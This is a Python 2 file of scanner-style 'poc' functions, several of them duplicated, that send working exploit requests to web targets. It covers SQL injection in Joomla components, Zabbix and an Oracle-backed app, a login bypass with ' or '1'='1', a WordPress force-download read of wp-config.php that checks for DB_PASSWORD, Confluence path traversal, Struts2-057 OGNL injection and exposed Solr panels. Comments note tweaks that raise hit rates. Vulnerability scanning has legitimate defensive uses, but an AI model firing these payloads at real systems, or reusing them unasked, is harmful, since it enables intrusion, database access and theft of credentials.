def poc(_inp):
try:
if '://' not in _inp:
_inp = 'http://' + _inp
for inp in iterate_path(_inp):
payloads = ['/spaces/viewdefaultdecorator.action?decoratorName=']
for each in payloads:
if '.properties' in requests.get(url=inp + each).content:
return True
return False
except Exception, e:
return False
def poc(url):
if '://' not in url:
url = 'http://' + url
payload = '/force-download.php?file=wp-config.php'
for i in iterate_path(url):
if '?' in i:
continue
target = i.rstrip('/') + payload
try:
r = urllib2.urlopen(target).read() # cannot use requests here
if 'define(' in r and 'DB_PASSWORD' in r:
return target
except Exception, e:
pass
def poc(url):
if '://' not in url:
url = 'http://' + url
for each in iterate_path(url):
plain, cipher = randomMD5(3)
payload = "/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=1 AND (SELECT 7804 FROM(SELECT COUNT(*),CONCAT(0x7176786b71,(MID((IFNULL(CAST(md5({plain}) AS CHAR),0x20)),1,54)),0x716b707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)".format(plain=plain)
if '?' in each:
continue
target_url = url.rstrip('/') + payload
try:
r = requests.get(target_url, timeout=10)
if cipher in r.content:
return each
except Exception, e:
pass
def poc(url):
if '://' not in url:
url = 'http://' + url
for each in iterate_path(url):
plain, cipher = randomMD5(3)
payload = "/index.php?option=com_videoflow&task=search&vs=1&searchword=-3920%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x71786a7a71%2C%28MID%28%28IFNULL%28CAST%28md5%28{plain}%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%29%2C0x716b6b7a71%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23".format(plain=plain)
if '?' in each:
continue
target_url = url.rstrip('/') + payload
try:
r = requests.get(target_url, timeout=10)
if cipher in r.content:
return each
except Exception, e:
pass
def poc(target):
base_url = target if "://" in target else 'http://' + target
for each in iterate_path(base_url):
try:
url = each
g = requests.get(url, headers={'User-Agent': firefox()})
if g.status_code is 200 and 'Solr Admin' in g.content and 'Dashboard' in g.content:
return url
url = url + '/solr/'
g = requests.get(url, headers={'User-Agent': firefox()})
if g.status_code is 200 and 'Solr Admin' in g.content and 'Dashboard' in g.content:
return url
except Exception:
pass
return False
def poc(url):
if '://' not in url:
if ':443' in url:
url = 'https://' + url
else:
url = 'http://' + url
payload = "/express/showNotice.do?report_type=1&GKEY=2 AND 9753=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(119)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9753=9753) THEN 1 ELSE 0 END) FROM DUAL)||CHR(112)||CHR(107)||CHR(107)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)"
for each in iterate_path(url):
target = each.rstrip('/') + payload
try:
r = requests.get(target, timeout=20)
if 'Warning: invalid QName ":qjwbq1pkkvq"' in r.content:
return url
except Exception:
pass
return False
def poc(url):
if '://' not in url:
url = 'http://' + url
payload = "' or '1'='1' -- ' ~ ' or '1'='1'"
data = {'userid': payload, 'userpass': payload, 'submit': 'Enter'}
for each in iterate_path(url):
if '?' in each:
continue
target = each.rstrip('/') + '/myadmin/admin_validation.php'
try:
r = requests.post(target, data=data, timeout=15)
if 'form name="frmNextstep"' in r.content:
return target
except Exception:
pass
return False
def poc(url):
if '://' not in url:
url = 'http://' + url
payload = "' or '1'='1' -- ' ~ ' or '1'='1'"
data = {'userid': payload, 'userpass': payload, 'submit': 'Enter'}
for each in iterate_path(url):
if '?' in each:
continue
target = each.rstrip('/') + '/myadmin/admin_validation.php'
try:
r = requests.post(target, data=data, timeout=15)
if 'form name="frmNextstep"' in r.content:
return target
except Exception:
pass
return False
def poc(url):
if '://' not in url:
url = 'http://' + url
payload = "/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
for each in iterate_path(url):
if '?' in each:
continue
target_url = url.rstrip('/') + payload
try:
r = requests.get(target_url, timeout=10)
if 'ed733b8d10be225eceba344d533586' in r.content:
return '[mysql]' + each
if 'Error in query [' in r.content or 'SQL error [' in r.content:
return each
except Exception, e:
pass
def poc(url):
if '://' not in url:
url = 'http://' + url
payload = "/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
for each in iterate_path(url):
if '?' in each:
continue
target_url = url.rstrip('/') + payload
try:
r = requests.get(target_url, timeout=10)
if 'ed733b8d10be225eceba344d533586' in r.content:
return '[mysql]'+ each
if 'Error in query [' in r.content or 'SQL error [' in r.content:
return each
except Exception, e:
pass
def poc(url):
if '://' not in url:
url = 'http://' + url
for each in iterate_path(url):
plain, cipher = randomMD5(3)
payload = "/index.php?option=com_videoflow&task=search&vs=1&searchword=-3920%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x71786a7a71%2C%28MID%28%28IFNULL%28CAST%28md5%28{plain}%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%29%2C0x716b6b7a71%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23".format(
plain=plain)
if '?' in each:
continue
target_url = url.rstrip('/') + payload
try:
r = requests.get(target_url, timeout=10)
if cipher in r.content:
return each
except Exception, e:
pass
def poc(url):
if '://' not in url:
url = 'http://' + url
for each in iterate_path(url):
plain, cipher = randomMD5(3)
payload = "/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=1 AND (SELECT 7804 FROM(SELECT COUNT(*),CONCAT(0x7176786b71,(MID((IFNULL(CAST(md5({plain}) AS CHAR),0x20)),1,54)),0x716b707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)".format(plain=plain)
if '?' in each:
continue
target_url = url.rstrip('/') + payload
try:
r = requests.get(target_url, timeout=10)
if cipher in r.content:
return each
except:
pass
return False
def poc(url, **kwargs):
if kwargs.get('ip'):
url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
else:
url = url
timeout = 10
domain = get_domain(url)
proxies = {'http': '127.0.0.1:9999'}
headers = {
"User-Agent":
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0'
}
ran_a = random.randint(10000000, 20000000)
ran_b = random.randint(1000000, 2000000)
ran_check = ran_a - ran_b
parser = urlparse(url)
if parser.path:
_path_list = parser.path.replace('//', '/').strip('/').split('/')[-1]
else:
_path_list = 'index.action'
url_list = iterate_path(url)
for urls in url_list:
url = urls + '/${%s-%s}/%s' % (ran_a, ran_b, _path_list)
try:
res = requests.get(
url,
timeout=timeout,
headers=headers,
allow_redirects=False,
verify=False,
)
if res.status_code == 302 and res.headers.get(
'Location') is not None and str(
ran_check) in res.headers.get('Location'):
urlLoca = res.headers.get('Location')
res2 = requests.get(domain + urlLoca,
headers=headers,
timeout=6,
allow_redirects=False,
verify=False)
if str(ran_check) in res2.text:
result = "目标存在 Struts2-057, check url: %s" % url
return result
except:
pass
def poc(url):
if '://' not in url:
if ':443' in url:
url = 'https://' + url
else:
url = 'http://' + url
plain, cipher = randomMD5()
# 用全部字段验证,增加70%结果
payload = "/about/show.php?lang=en&id=-2864 UNION ALL SELECT " + (("md5(%s)," % plain) * 27).rstrip(',') + '--'
for each in iterate_path(url): # 对每个子路径尝试,增加20%结果
target = each.rstrip('/') + payload
try:
r = requests.get(target, timeout=20)
if r.status_code == 200 and cipher in r.content:
return url
except Exception:
pass # 从break改为pass增加10%结果
return False